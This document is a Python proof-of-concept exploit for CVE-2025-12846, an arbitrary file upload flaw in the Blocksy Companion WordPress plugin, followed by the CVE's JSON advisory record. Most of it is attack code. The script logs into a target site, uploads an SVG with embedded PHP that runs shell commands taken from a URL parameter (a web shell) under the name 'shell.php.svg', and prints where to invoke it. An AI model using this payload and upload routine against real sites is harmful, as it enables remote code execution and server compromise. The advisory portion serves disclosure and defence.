CVE-2025-12846

import requests import sys # CVE-2025-12846 PoC - Blocksy Companion SVG File Upload # Target: WordPress site with Blocksy Companion plugin <= 2.1.19 def create_malicious_svg(): """Create malicious SVG file with embedded PHP code""" svg_content = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <script type="text/javascript"> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); exit; } ?> </script> </svg>''' return svg_content def upload_payload(target_url, username, password, filename='shell.php.svg'): """Upload malicious SVG file via Blocksy Companion""" session = requests.Session() # Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) # Upload malicious file via Blocksy Companion SVG upload endpoint upload_url = f"{target_url}/wp-admin/admin-ajax.php" files = { 'file': (filename, create_malicious_svg(), 'image/svg+xml') } data = { 'action': 'ct_companion_upload_svg', 'nonce': 'your_nonce_here' # Need to get valid nonce first } resp = session.post(upload_url, files=files, data=data) if resp.status_code == 200: print(f"[+] File uploaded successfully: {filename}") print(f"[+] Access payload at: {target_url}/wp-content/uploads/{filename}") print(f"[+] Execute command: ?cmd=whoami") else: print(f"[-] Upload failed: {resp.text}") if __name__ == '__main__': if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] upload_payload(target, user, pwd)

{"cve": {"id": "CVE-2025-12846", "sourceIdentifier": "[email protected]", "published": "2025-11-11T11:15:35.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blocksy Companion plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 2.1.19. This is due to insufficient file type validation detecting SVG files, allowing double extension files to bypass sanitization while being accepted as a valid SVG file. This makes it possible for authenticated attackers, with author level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3391933/blocksy-companion/trunk/framework/features/svg.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8615422-5db7-495d-9956-7d6f658f42bf?source=cve", "source": "[email protected]"}]}}